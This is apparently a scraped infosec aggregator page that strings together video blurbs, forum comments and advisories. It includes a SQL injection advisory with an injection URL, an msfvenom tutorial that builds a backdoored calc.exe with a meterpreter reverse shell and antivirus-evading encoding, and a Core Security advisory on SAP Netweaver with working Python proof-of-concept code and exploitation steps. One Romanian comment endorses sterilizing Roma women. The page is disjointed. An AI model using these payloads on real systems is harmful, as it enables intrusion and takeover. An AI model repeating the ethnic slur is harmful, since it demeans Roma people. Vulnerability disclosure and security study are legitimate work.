Praetorian503

Scripts Genie Gallery Personals script suffers from a remote SQL injection vulnerability. ################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ ################################################################################## Gallery Personals Script SQL Injection Vulnerabilities Software Page: http://scriptsgenie.com/ Product Page: http://www.hotscripts.com/listing/gallery-personals/ Script Demo: http://resalemembership.com/demos/pgallery/ Author(Pentester): 3spi0n On Social: Twitter.Com/eyyamgudeer Greetz: Grayhats Inc. and Janissaries Platform. ################################################################################## [~] MySQL Injection on Demo Site (/gallery.php?L=) >>> http://server/demos/pgallery/gallery.php?L=2' (MySQLi Found) Source: PacketStorm

Description: OWASP Mantra: OWASP Mantra | Home chillyCMS - chillycms.bplaced.net Exploit-DB: www.exploit-db.com/exploits/24507/ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Chillycms Multiple Vulnerabilities

Description: Read the article at: Solving OWASP Bricks Challenge #3 using SQLMap and Havij | Hacking Articles Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Solving Owasp Bricks Challenge #3 Using Havij

Description: Read the article at: Solving OWASP Bricks Challenge #3 using SQLMap and Havij | Hacking Articles Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Solving Owasp Bricks Challenge #3 Using Sqlmap

Description: David Litchfield is the founder and chief research scientist of NGSSoftware Ltd., a UK-based security solutions provider. He has been recognized as the world's premier expert on Oracle database security, and is the designer of NGSSQuirreL, a powerful tool for identifying and assessing database vulnerability. David is a regular conference speaker and has lectured government agencies on security topics. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Blackhat 2010 - Hacking Oracle 11g

Description: From start to finish, we will walk through how a current generation smartcard was successfully compromised. The talk will discuss everything that was required in the order the events took place. We will cram several months into an hour! PS- The talk will be very technical mixed hardware and software (60% hardware, 40% software). Christopher Tarnovsky runs Flylogic Engineering, LLC and specializes in analysis of semiconductors from a security "how strong is it really" standpoint. Flylogic offers detailed reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a detailed report all aspects of how the attack was done, level of complexity and so on. This is something we believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make them make it better (or possibly use a different part). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Blackhat 2010 - Deconstructing A Secure Processor

Si cu asta ce e? 1. Se scrie Security, nu securyti; 2. A downloada un tool de pe net, nu se rezulma la a fi pasionat de 'hack'; 3. Asta nu e prezentare normala (daca vei rascoli prin thread-uri vei gasi asa ceva); 4. Dai edit la post si scrieti parerile despre Polonic and SRI, daca ai prietena si cati ani are (eventual nr. de telefon si CNP); 5. Sunt sigur ca o vei arde pe offtopic dupa care vei cere 1$ pentru a licita o cutie de prezervative safe; 6. Un admin/mod va trece pe aici si te va boteza.

Thanks, folositor, functioneaza.

Description: Jorge Luis Alvarez Medina is a Computer Engineer experienced in hardware and software development and security assessment (network and web applications penetration testing) and development (turn-key access control systems, security tools and scripts). Currently working as Security Consultant for CORE Security Technologies. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Blackhat 2010 - Internet Explorer Turns Your Personal Computer Into A Public Files Server

Description: Today I am going to show you how to backdoor executables using msfvenom. This is a very handy tool in exploitaion. What is MSFVenom? MSFVEnom is a combination of MSFPayload and MSFEncode. It is a all in one framework that makes us easy in creating backdoor executables. In this tutorial I will backdoor calc.exe in a Windows XP SP2 system. I will use a reverse connection back to my back track machine. Our template is calc.exe and we will encode using x86/shikata_ga_nai encoder (I normally use this, you can use what ever you like) and encode this 10 times. So this will the parameter of using msfvenom. msfvenom -p windows/meterpreter/reverse_tcp LHOST= [ your local ip ] LPORT=[ your local port ] -x calc.exe -k -e x86/shikata_ga_nai -i 10 -f exe > calc_backdoor.exe I will break it down and exlain this for you. -p stands for our payload here i have used a meterpreter reverse connection which is awesome to use. LHOST is your local IP and LPORT is your local open port listening. -x is the template we are going to use or simply our custom executable. -k we use this option to start our payload in a new thread otherwise our win32 executable won't load into memory instead the payload will only be executed. -e is the encoder to use you can use whatever you like, you can view all the encoders in the metasploit framework by typing 'show encoders'. Encoders are important in evading AVs but this is not perfect as we think, the best way is to write our custom encoders for better results.-i stand for iteration or our count, how many times we would encode. -f is the format we are going to use so in my case I will use exe as the format. So that's it from the creation of our backdoor. Now we will launch Metasploit and use exploit/multihandler. This is a stub that handles exploits launched outside our framework. As our backdoor listens to the specified settings we have to give the same payload, same local host and same port which we used at the creation of our backdoor. so that's it run exploit and msf will start listening. Okay now lets dump our created backdoor which works fine as a calculator , just like a clone of calculator. Once the victim runs our infected calc.exe we should get a nice meterpreter revserse connection . So that's it the box is pwned. We can create the same backdoor by piping msfencode into msfpayload which results a very long parameter and difficult to memorize the commands. msfpayload windows/meterpreter/reverse_tcp LHOST=[ your local ip ] LPORT=[ your local ip ] R | msfencode -e x86/shikata_ga_nai -c 10 -o calc_backdoor.exe -t exe -x calc.exe -k So by using MSFVenom easily we can generate payload along with encoding in a simple manner. I hope you learnt something useful. Thank you. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Making Backdoors With Msfvenom

Description: This video is all about Post – Exploitation and Maintaining Access with Encrypted Backdoor after you exploit a system – maintaining access is very important part of hacking. Ones you exploited the system next time who knows that you can again exploit the system maybe that vulnerability patches or any other issues. That’s why post – exploitation and Maintaining Access is very important part of hacking. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Maintaining Access

Description: Welcome to Part 8 of the Aircrack-ng Megaprimer series in which I will discuss the tool airgraph-ng. Airgraph-ng is a visual representation tool for data captured via airodump-ng, and can come quite in handy to make sense of a lot of data. As always, if you have any questions or comments, you can either leave them in the comments section below or zip me an e-mail at bennett@securitytube.net Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 8: Airgraph-Ng

Description: This video will give you the information about all linux processes running in back-end. You don't need to install any 3rd party tool because linux itself giving the best process management in terminal. So kindly use it. Thank you for watching. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Linux Terminal - Processes

Super, felicitari!

Ii plateam pentru sterilizarea femeilor rome.

Description: Lutz Donnerhacke holds the lecture. In this presentation, the technical, organizational and political will basics of DNS presented. The DNS is the resolution of host names to IP addresses and thus represents one of the most important services in the Internet represents the Internet Corporation for Assigned Names and Numbers (ICANN) manages to (the top-level domains. org. com,. de . at) and acts as a kind of global governance of the Internet. Due to the high technical impact of DNS on the Internet from various sites exerted political pressure on ICANN to enforce example Websperren or take whole countries from the DNS. The lecture was on the 1st Security Policy development academy of the Federation Security Studies. Link to event: blog.deepsec.net / p = 330 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: ICANN - DNS - Websperren on Vimeo Source: Icann - Dns - Websperren

Core Security Technologies Advisory - Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN (being NN the SAP system number) of a host running the 'Message Server' service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN (being NN the SAP system number) of a host running the 'Message Server' service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 2004s (msg_server.exe version v6400.61.11.10122) . SAP Netweaver 7.01 SR1 (msg_server.exe version v7010.29.15.58313) . SAP Netweaver 7.02 SP06 (msg_server.exe version v7200.70.18.23869) . SAP Netweaver 7.30 SP04 (msg_server.exe version v7200.201.0.0) . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. Contact SAP for further information. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver Message Server _MsJ2EE_AddStatistics Vulnerability* [CVE-2013-1592] The vulnerability can be triggered when SAP Netweaver 'msg_server.exe' module processes a specially crafted network packet containing a request with 'iflag' value 0x0c 'MS_J2EE_SEND_TO_CLUSTERID', or 0x0d 'MS_J2EE_SEND_BROADCAST'. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. This vulnerability might allow a remote, unauthenticated attacker to execute arbitrary code with the privileges of the user running the 'Message Server' service or conduct a denial of service attack against the vulnerable systems. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Gain remote code execution by overwriting function pointers. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. *SAP Netweaver Message Server WRITE_C Vulnerability* [CVE-2013-1593] The vulnerability can be triggered when SAP Netweaver 'msg_server.exe' module process a specially crafted network packet containing a request with administrative opcode 0x15 'AD_RZL_STRG'. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. . 2012-12-10: Core sends an advisory draft with technical details and a PoC. . 2012-12-11: The SAP team confirms the reception of the issue. . 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. . 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. . 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. . 2013-01-22: First release date missed. . 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. . 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. . 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. . 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. . 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. . 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. Source: PacketStorm

